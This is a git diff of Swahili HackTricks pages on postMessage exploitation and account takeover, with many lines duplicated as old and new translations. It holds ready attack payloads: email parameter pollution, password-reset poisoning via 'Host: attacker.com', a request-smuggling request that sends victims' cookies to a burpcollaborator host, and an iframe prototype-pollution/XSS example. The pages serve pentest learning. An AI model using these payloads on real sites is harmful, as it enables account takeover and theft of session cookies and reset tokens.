Kwa kufafanua **`allow-popups`** katika kipengele cha sandbox, dirisha lolote la popup lililofunguliwa kutoka ndani ya iframe linarithi vikwazo vya sandbox ya mzazi wake. Hii inamaanisha kwamba isipokuwa **`allow-popups-to-escape-sandbox`** pia imejumuishwa, asili ya dirisha la popup pia inawekwa kwa `null`, ikilinganisha na asili ya iframe.
Kwa kufafanua **`ruhusu-popups`** katika kipengele cha sanduku, dirisha lolote la popup lililofunguliwa kutoka ndani ya iframe linarithi vikwazo vya sanduku vya mzazi wake. Hii inamaanisha kwamba isipokuwa **kipengele cha `ruhusu-popups-to-escape-sandbox`** pia kimejumuishwa, asili ya dirisha la popup pia inawekwa kwa `null`, ikilinganisha na asili ya iframe.
Kufuatia hivyo, wakati popup inapofunguliwa chini ya hali hizi na ujumbe unatumwa kutoka kwa iframe kwenda kwa popup kwa kutumia **`postMessage`**, pande zote za kutuma na kupokea zina asili zao zimewekwa kwa `null`. Hali hii inapelekea kwa tukio ambapo **`e.origin == window.origin`** ina thamani ya kweli (`null == null`), kwa sababu iframe na popup zote zina thamani sawa ya asili ya `null`.
Kufuatia hivyo, wakati popup inapofunguliwa chini ya hali hizi na ujumbe unatumwa kutoka kwa iframe kwenda kwa popup kwa kutumia **`postMessage`**, pande zote za kutuma na kupokea zina asili zao zimewekwa kwa `null`. Hali hii inapelekea kwa hali ambapo **`e.origin == window.origin`** inathibitisha kuwa kweli (`null == null`), kwa sababu iframe na popup zote zina thamani sawa ya asili ya `null`.
Kwa habari zaidi **soma**:
@ -146,7 +160,7 @@ Kwa habari zaidi **soma**:
### Kuihepa e.source
Inawezekana kuchunguza ikiwa ujumbe umetoka kwenye dirisha sawa ambalo skripti inasikiliza (hasa ya kuvutia kwa **Vifaa vya Skripti za Yaliyomo kutoka kwa vifaa vya kivinjari** ili kuhakikisha ikiwa ujumbe ulitumwa kutoka kwenye ukurasa sawa):
Inawezekana kuthibitisha ikiwa ujumbe umetoka kwenye dirisha sawa ambalo skripti inasikiliza (hasa ya kuvutia kwa **Vifaa vya Skripti za Yaliyomo kutoka kwa vifaa vya kivinjari** kuthibitisha ikiwa ujumbe ulitumwa kutoka kwenye ukurasa sawa):
```javascript
// If its not, return immediately.
if( received_message.source !== window ) {
@ -163,7 +177,7 @@ Kwa maelezo zaidi **soma:**
### Kizuizi cha Kichwa cha X-Frame
Ili kutekeleza mashambulizi haya kwa njia bora, unaweza **kuweka ukurasa wa mwathiriwa** ndani ya `iframe`. Lakini vichwa vya kama `X-Frame-Header` vinaweza **kuzuia** hilo.\
Ili kutekeleza mashambulizi haya kwa ufanisi unaweza **kuweka ukurasa wa mwathiriwa** ndani ya `iframe`. Lakini baadhi ya vichwa kama `X-Frame-Header` vinaweza **kuzuia** hilo.\
Katika hali hizo, bado unaweza kutumia shambulizi lisilo la siri. Unaweza kufungua kichupo kipya kwa programu ya wavuti yenye kasoro na kuwasiliana nayo:
```markup
<script>
@ -173,7 +187,7 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
```
### Kuiba ujumbe uliotumwa kwa mtoto kwa kuzuia ukurasa kuu
Kwenye ukurasa ufuatao unaweza kuona jinsi unavyoweza kuiba **data nyeti ya postmessage** iliyotumwa kwa **iframe ya mtoto** kwa **kuzuia** ukurasa **mkuu** kabla ya kutuma data na kutumia **XSS katika mtoto** kwa **kuvuja kwa data** kabla haijapokelewa:
Katika ukurasa ufuatao unaweza kuona jinsi unavyoweza kuiba **data nyeti ya postmessage** iliyotumwa kwa **iframe ya mtoto** kwa **kuzuia** ukurasa **mkuu** kabla ya kutuma data na kutumia **XSS katika mtoto** kwa **kuvuja kwa data** kabla haijapokelewa:
{% content-ref url="blocking-main-page-to-steal-postmessage.md" %}
[blocking-main-page-to-steal-postmessage.md](blocking-main-page-to-steal-postmessage.md)
@ -181,7 +195,7 @@ Kwenye ukurasa ufuatao unaweza kuona jinsi unavyoweza kuiba **data nyeti ya post
### Kuiba ujumbe kwa kubadilisha mahali pa iframe
Ikiwa unaweza kuweka iframe kwenye ukurasa bila Kichwa cha X-Frame kinachohitajika ambacho kina iframe nyingine, unaweza **kubadilisha mahali pa iframe ya mtoto**, hivyo ikiwa inapokea **postmessage** iliyotumwa kwa **alama ya asterisk**, mshambuliaji anaweza **kubadilisha** asili ya iframe hiyo kwenda kwenye ukurasa **unaodhibitiwa** na yeye na **kuiba** ujumbe huo:
Ikiwa unaweza kuweka iframe kwenye ukurasa bila X-Frame-Header ambao una iframe nyingine, unaweza **kubadilisha mahali pa iframe ya mtoto**, hivyo ikiwa inapokea **postmessage** iliyotumwa kwa **alama ya asterisk**, mshambuliaji anaweza **kubadilisha** asili ya iframe hiyo kwenda kwenye ukurasa **anaodhibiti** na **kuiba** ujumbe:
{% content-ref url="steal-postmessage-modifying-iframe-location.md" %}
[steal-postmessage-modifying-iframe-location.md](steal-postmessage-modifying-iframe-location.md)
@ -189,11 +203,11 @@ Ikiwa unaweza kuweka iframe kwenye ukurasa bila Kichwa cha X-Frame kinachohitaji
### postMessage kwa Uchafuzi wa Prototype na/au XSS
Katika mazingira ambapo data inayotumwa kupitia `postMessage` inatekelezwa na JS, unaweza **kuweka iframe** kwenye **ukurasa** na **kutumia** **uchafuzi wa prototype/XSS** kutuma shambulio kupitia `postMessage`.
Katika mazingira ambapo data inayotumwa kupitia `postMessage` inatekelezwa na JS, unaweza **kuweka iframe** kwenye **ukurasa** na **kutumia** **uchafuzi wa prototype/XSS** kutuma uchafuzi kupitia `postMessage`.
Mifano ya **XSS iliyoelezwa vizuri sana kupitia `postMessage`** inaweza kupatikana katika [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)
Mfano wa shambulio la kutumia **Uchafuzi wa Prototype na kisha XSS** kupitia `postMessage` kwa `iframe`:
Mfano wa uchafuzi wa kutumia **Uchafuzi wa Prototype na kisha XSS** kupitia `postMessage` kwa `iframe`:
```html
<html>
<body>
@ -221,6 +235,18 @@ Kwa **maelezo zaidi**:
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
* Kwa mazoezi: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -231,6 +257,6 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,26 +1,46 @@
# Mafunzo ya kuhack AWS kutoka sifuri hadi bingwa na [htARTE (HackTricks AWS Red Team Expert)](https://training.hacktricks.xyz/courses/arte)!
# Misaada ya Usajili & Udhibiti wa Akaunti
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
- Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
- Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
- **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
## Uchukuzi wa Usajili
</details>
### Usajili wa Nakala
## WhiteIntel
- Jaribu kuzalisha kwa kutumia jina la mtumiaji lililopo
- Angalia kubadilisha barua pepe:
- herufi kubwa
- \+1@
- ongeza alama ya nukta kwenye barua pepe
- herufi maalum kwenye jina la barua pepe (%00, %09, %20)
- Weka herufi nyeusi baada ya barua pepe: `test@test.com a`
- victim@gmail.com@attacker.com
- victim@attacker.com@gmail.com
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wamedukuliwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na udhibiti wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
{% embed url="https://whiteintel.io" %}
---
## Udhibiti wa Usajili
### Usajili wa Kulinganisha
* Jaribu kujaribu kutumia jina la mtumiaji lililopo
* Angalia kwa kubadilisha barua pepe:
* herufi kubwa
* \+1@
* ongeza alama ya mshale katika barua pepe
* herufi maalum katika jina la barua pepe (%00, %09, %20)
* Weka herufi nyeusi baada ya barua pepe: `test@test.com a`
* victim@gmail.com@attacker.com
* victim@attacker.com@gmail.com
### Uchunguzi wa Jina la Mtumiaji
@ -28,20 +48,20 @@ Angalia ikiwa unaweza kugundua wakati jina la mtumiaji tayari limeandikishwa nda
### Sera ya Nenosiri
Unapounda mtumiaji, angalia sera ya nenosiri (angalia ikiwa unaweza kutumia nywila dhaifu).\
Katika kesi hiyo, unaweza kujaribu kuvunja nywila.
Kuunda mtumiaji angalia sera ya nenosiri (angalia ikiwa unaweza kutumia nywila dhaifu).\
Katika kesi hiyo unaweza kujaribu kudukua maelezo ya kuingia.
### SQL Injection
### Udukuzi wa SQL
[**Angalia ukurasa huu**](sql-injection/#insert-statement) ili kujifunza jinsi ya kujaribu kuchukua akaunti au kutoa habari kupitia **SQL Injections** kwenye fomu za usajili.
[**Angalia ukurasa huu** ](sql-injection/#insert-statement)ili kujifunza jinsi ya kujaribu udhibiti wa akaunti au kutoa taarifa kupitia **SQL Injections** kwenye fomu za usajili.
### Uchukuzi wa Oauth
### Udukuzi wa Oauth
{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
{% endcontent-ref %}
### Mabomu ya SAML
### Mapungufu ya SAML
{% content-ref url="saml-attacks/" %}
[saml-attacks](saml-attacks/)
@ -49,35 +69,35 @@ Katika kesi hiyo, unaweza kujaribu kuvunja nywila.
### Badilisha Barua pepe
Baada ya kusajiliwa, jaribu kubadilisha barua pepe na angalia ikiwa mabadiliko haya yanathibitishwa kwa usahihi au yanaweza kubadilishwa kuwa barua pepe za kiholela.
Baada ya kusajili jaribu kubadilisha barua pepe na angalia ikiwa mabadiliko haya yanathibitishwa kwa usahihi au yanaweza kubadilishwa kuwa barua pepe za kupindukia.
### Uchunguzi Zaidi
- Angalia ikiwa unaweza kutumia **barua pepe za kutumia na kutupa**
- **Nenosiri ndefu** (>200) husababisha **DoS**
- **Angalia mipaka ya kiwango cha uundaji wa akaunti**
- Tumia username@**burp\_collab**.net na uchambue **callback**
* Angalia ikiwa unaweza kutumia **barua pepe za kutumika mara moja**
* **Nenosiri ndefu** (>200) husababisha **DoS**
* **Angalia mipaka ya kiwango cha uundaji wa akaunti**
* Tumia username@**burp\_collab**.net na uchambue **kurudi kwa wito**
## **Uchukuzi wa Kurejesha Nenosiri**
## **Udhibiti wa Rudisha Nenosiri**
### Kuvuja kwa Kitufe cha Kurejesha Nenosiri Kupitia Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
### Kuvuja kwa Alama ya Rudisha Nenosiri Kupitia Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
1. Omba kurejesha nenosiri kwa anwani yako ya barua pepe
2. Bonyeza kiunga cha kurejesha nenosiri
2. Bonyeza kiungo cha kurejesha nenosiri
3. Usibadilishe nenosiri
4. Bonyeza tovuti za 3rd party (k.m. Facebook, twitter)
5. Ingilia ombi kwenye kichupo cha Burp Suite proxy
6. Angalia ikiwa kichwa cha kurejelea kinavuja kitufe cha kurejesha nenosiri.
4. Bonyeza tovuti za tatu (k.m: Facebook, twitter)
5. Kukamata ombi katika proksi ya Burp Suite
6. Angalia ikiwa kichwa cha referrer kinavuja nenosiri la kurejesha nenosiri.
### Kuharibu Kurejesha Nenosiri <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
### Sumu ya Rudisha Nenosiri <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
1. Ingilia ombi la kurejesha nenosiri kwenye Burp Suite
2. Ongeza au hariri vichwa vifuatavyo kwenye Burp Suite: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Wasilisha ombi na kichwa kilichobadilishwa\
1. Kukamata ombi la kurejesha nenosiri katika Burp Suite
2. Ongeza au hariri vichwa vifuatavyo katika Burp Suite: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Wasilisha ombi lenye kichwa kilichobadilishwa\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Tafuta URL ya kurejesha nenosiri kulingana na kichwa cha _host_ kama vile: `https://attacker.com/reset-password.php?token=TOKEN`
4. Tafuta URL ya kurejesha nenosiri kulingana na _kichwa cha mwenyeji_ kama: `https://attacker.com/reset-password.php?token=TOKEN`
### Kurejesha Nenosiri Kupitia Parameta ya Barua pepe <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
### Rudisha Nenosiri Kupitia Parameta ya Barua pepe <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```powershell
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
@ -96,56 +116,56 @@ email=victim@mail.com|hacker@mail.com
```
### IDOR kwenye Vigezo vya API <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
1. Mshambuliaji anapaswa kuingia kwenye akaunti yake na kwenda kwenye kipengele cha **Badilisha nenosiri**.
2. Anza Burp Suite na Kukamata ombi.
3. Tuma ombi kwenye kichupo cha kurudia na hariri vigezo: Kitambulisho cha Mtumiaji/barua pepe\
`powershell POST /api/changepass [...] ("fomu": {"barua pepe":"victim@email.com","nenosiri":"securepwd"})`
1. Mshambuliaji lazima aingie kwenye akaunti yao na kwenda kwenye kipengele cha **Badilisha nenosiri**.
2. Anza Burp Suite na Kukamata ombi
3. Tuma kwenye kichupo cha kurudia na urekebishe vigezo: Kitambulisho cha Mtumiaji/barua pepe\
`powershell POST /api/changepass [...] ("fomu": {"barua pepe":"mwathirika@email.com","nenosiri":"nenosiri salama"})`
### Kitufe dhaifu cha Rudisha Nenosiri <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
### Kitufe Dhaifu cha Kurejesha Nenosiri <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
Kitufe cha rudisha nenosiri kinapaswa kuundwa kwa nasibu na kuwa tofauti kila wakati.\
Jaribu kubaini ikiwa kitufe hicho kinakwisha au ikiwa ni sawa kila wakati, katika baadhi ya kesi algorithm ya uundaji ni dhaifu na inaweza kubashiriwa. Hizi ni baadhi ya pembejeo zinazoweza kutumiwa na algorithm.
Kitufe cha kurejesha nenosiri kinapaswa kuundwa kwa nasibu na kuwa tofauti kila wakati.\
Jaribu kubaini ikiwa kitufe hicho kina muda wa kumalizika au ikiwa ni sawa kila wakati, kwa baadhi ya matukio, algorithmu ya uundaji ni dhaifu na inaweza kubashiriwa. Vigezo vifuatavyo vinaweza kutumiwa na algorithmu.
* Muda
* Muda wa saa
* Kitambulisho cha Mtumiaji
* Barua pepe ya Mtumiaji
* Jina la Kwanza na Jina la Mwisho
* Jina la Kwanza na la Mwisho
* Tarehe ya Kuzaliwa
* Kriptografia
* Nambari pekee
* Mfuatano mdogo wa kitufe (herufi kati ya \[A-Z,a-z,0-9])
* Matumizi ya kitufe mara nyingi
* Tarehe ya kumalizika ya kitufe
* Utumiaji wa kitufe
* Tarehe ya muda wa kitufe kumalizika
### Kuvuja kwa Kitufe cha Rudisha Nenosiri <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
### Kuvuja kwa Kitufe cha Kurejesha Nenosiri <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
1. Chokoza ombi la kurejesha nenosiri kwa kutumia API/UI kwa barua pepe maalum kama vile: test@mail.com
1. Chochote ombi la kurejesha nenosiri kwa kutumia API/UI kwa barua pepe fulani kama vile: test@mail.com
2. Angalia majibu ya seva na tafuta `resetToken`
3. Kisha tumia kitufe hicho kwenye URL kama vile `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
3. Kisha tumia kitufe kwenye URL kama `https://mfano.com/v3/mtumiaji/nenosiri/rejesha?resetToken=[KITUFU_CHA_KUREJESHA]&barua pepe=[BARUA_PEPE]`
### Rudisha Nenosiri Kupitia Kugongana kwa Jina la Mtumiaji <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
### Kurejesha Nenosiri Kupitia Mgongano wa Jina la Mtumiaji <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
1. Jisajili kwenye mfumo na jina la mtumiaji sawa na jina la mtumiaji wa muathirika, lakini na nafasi nyeupe zilizoingizwa kabla na/au baada ya jina la mtumiaji. Kwa mfano: `"admin "`
2. Omba kurejesha nenosiri na jina lako la mtumiaji mbaya.
3. Tumia kitufe kilichotumwa kwenye barua pepe yako na rudisha nenosiri la muathirika.
4. Ingia kwenye akaunti ya muathirika kwa kutumia nenosiri jipya.
1. Jisajili kwenye mfumo na jina la mtumiaji linalofanana na jina la mtumiaji wa muhanga, lakini na nafasi nyeupe zilizoingizwa kabla na/au baada ya jina la mtumiaji. k.m: `"admin "`
2. Omba kurejesha nenosiri na jina lako la mtumiaji la hila.
3. Tumia kitufe kilichotumwa kwenye barua pepe yako na urejeshe nenosiri la muhanga.
4. Unganisha kwenye akaunti ya muhanga na nenosiri jipya.
Jukwaa la CTFd lilikuwa na udhaifu kwa shambulio hili.\
Jukwaa la CTFd lilikuwa na udhaifu wa shambulio hili.\
Angalia: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
### Kuchukua Udhibiti wa Akaunti Kupitia Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
### Kuchukua Udhibiti wa Akaunti Kupitia Udukuzi wa Tovuti ya Msalaba <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
1. Tafuta XSS ndani ya programu au kikoa cha chini ikiwa vidakuzi vimehifadhiwa kwenye kikoa cha mzazi: `*.domain.com`
2. Vuja kuki ya kikao cha sasa
1. Tafuta XSS ndani ya programu au kikoa ikiwa vidakuzi vimeelekezwa kwa kikoa cha mzazi: `*.domain.com`
2. Vujisha **kuki za kikao za sasa**
3. Thibitisha kama mtumiaji kwa kutumia kuki
### Kuchukua Udhibiti wa Akaunti Kupitia HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
### Kuchukua Udhibiti wa Akaunti Kupitia Udukuzi wa Ombi la HTTP <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
1\. Tumia **smuggler** kugundua aina ya HTTP Request Smuggling (CL, TE, CL.TE)\
1. Tumia **smuggler** kugundua aina ya Udukuzi wa Ombi la HTTP (CL, TE, CL.TE)\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2\. Unda ombi ambalo litafuta `POST / HTTP/1.1` na data ifuatayo:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` na lengo la kuhamisha upya wa wazi wa waathirika kwa burpcollab na kuiba vidakuzi vyao\
3\. Ombi la mwisho linaweza kuonekana kama ifuatavyo
2. Unda ombi litakalobadilisha `POST / HTTP/1.1` na data ifuatayo:\
`GET http://kitu.burpcollaborator.net HTTP/1.1 X:` kwa lengo la kuhamisha waathiriwa kwenye burpcollab na kuiba kuki zao\
3. Ombi la mwisho linaweza kuonekana kama ifuatavyo
```
GET / HTTP/1.1
Transfer-Encoding: chunked
@ -157,18 +177,18 @@ Content-Length: 83
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
Ripoti za Hackerone zinaonyesha kuwa kuna udhaifu huu\
Hackerone ripoti za kutumia kosa hili\
\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
### Kuchukua Udhibiti wa Akaunti kupitia CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
1. Unda mzigo wa CSRF, kwa mfano: "Fomu ya HTML na uthibitisho wa moja kwa moja kwa mabadiliko ya nenosiri"
2. Tuma mzigo huo
1. Unda mzigo wa CSRF, k.m: "Fomu ya HTML na utoaji wa moja kwa moja kwa mabadiliko ya nenosiri"
2. Tuma mzigo
### Kuchukua Udhibiti wa Akaunti kupitia JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
Kitambulisho cha JSON Web Token kinaweza kutumika kuthibitisha mtumiaji.
Tokeni ya JSON Web inaweza kutumika kuthibitisha mtumiaji.
* Hariri JWT na Kitambulisho cha Mtumiaji / Barua pepe nyingine
* Angalia saini dhaifu ya JWT
@ -181,16 +201,30 @@ Kitambulisho cha JSON Web Token kinaweza kutumika kuthibitisha mtumiaji.
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa utendaji wa **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na kuchukua akaunti na mashambulio ya ransomware yanayotokana na programu hasidi ya wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,48 +1,62 @@
# EL - Lugha ya Ufafanuzi
# EL - Expression Language
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikionyeshwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
